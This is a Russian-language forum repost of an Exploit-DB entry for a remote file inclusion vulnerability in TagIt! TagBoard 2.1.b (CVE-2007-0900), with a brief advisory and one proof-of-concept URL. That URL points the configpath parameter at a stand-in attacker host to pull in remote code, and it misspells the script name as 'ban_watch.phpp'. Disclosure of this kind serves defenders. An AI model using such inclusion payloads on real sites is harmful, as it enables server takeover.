Exploit Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/ban_watch.php?configpath' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29582
Проверка EDB
  1. Пройдено
Автор
K-159
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-0900
Дата публикации
2007-02-12
Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/ban_watch.php?configpath' Remote File Inclusion
Код:
source: https://www.securityfocus.com/bid/22518/info
    
TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
    
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
    
TagBoard 2.1.b Build 2 and prior versions are vulnerable. 

http://www.example.com/[TagIt_path]/tagmin/ban_watch.phpp?configpath=http://example2.com/evil?
 
Источник
www.exploit-db.com

Похожие темы